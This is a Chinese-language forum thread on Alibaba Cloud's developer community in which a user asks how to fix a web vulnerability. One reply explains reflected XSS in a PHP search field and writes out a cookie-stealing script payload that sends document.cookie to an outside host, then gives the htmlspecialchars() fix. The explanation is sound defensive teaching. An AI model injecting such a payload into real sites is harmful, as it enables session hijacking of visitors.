web有漏洞这个真心不会修复-问答-阿里云开发者社区-阿里云

开发者社区> 问答> 正文

web有漏洞这个真心不会修复

baker668 2013-02-03 14:21:08 6987
                  

    这个看了一下详情,我都不知道怎么修复,才发现用个云这么难
安全
分享到
取消 提交回答
全部回答(10)
  • redich
    2013-02-04 23:01:56
    回8楼lujjjh的帖子
    受教了。
    搞了PHP大半年,没研究过这种跨站漏洞。
    0 0
  • ap5785g0j
    2013-02-04 15:21:47
    程序有漏洞可以打补丁来完成的吧
    0 0
  • lujjjh
    2013-02-03 23:47:41
    Reweb有漏洞这个真心不会修复
    比如你的 search.php 里写着:
    <input type="text" name="keyword" value="<<?php if (isset($_GET["keyword"])) echo $_GET["keyword"]; ?>" />这就会导致跨站漏洞。别人如果传入 keyword 为(为了看清楚,就不进行 URLEncode 了):
    "><script>new Image().src = "http://www.anotherdomain.com/xss.php?cookie="   escape(document.cookie);</script>
    你的网页内容就变成了: <input type="text" name="keyword" value=""><script>new Image().src = "http://www.anotherdomain.com/xss.php?cookie="   escape(document.cookie);</script>" />
    因为提交方式是 GET,所以直接 keyword 直接跟在网址后面即可。这样一来,如果攻击者把这个网址发给别人(或者是嵌入在他的网页里),当你访问他的页面时,你的 Cookie 就自动提交到他的服务器( www.anotherdomain.com)了,漏洞就产生了。

    要修复这个漏洞其实很简单,只要在输出前用 htmlspecialchars() 处理一下即可(PHP 中):
    <input type="text" name="keyword" value="<?php if (isset($_GET["keyword"])) echo htmlspecialchars($_GET["keyword"]); ?>" />
    0 0
  • omfaner
    2013-02-03 22:11:18
    Reweb有漏洞这个真心不会修复
    果断的不管阿里云啥事儿,还是乖乖的看看自己的网站吧
    0 0
  • baker668
    2013-02-03 19:06:49
    回5楼mrznz的帖子
    知道了 我果断解决了  

    -------------------------

    回8楼lujjjh的帖子
    嗯 太感谢了
    0 0
滑动查看更多
+ 订阅

云安全开发者的大本营

推荐文章
相似问题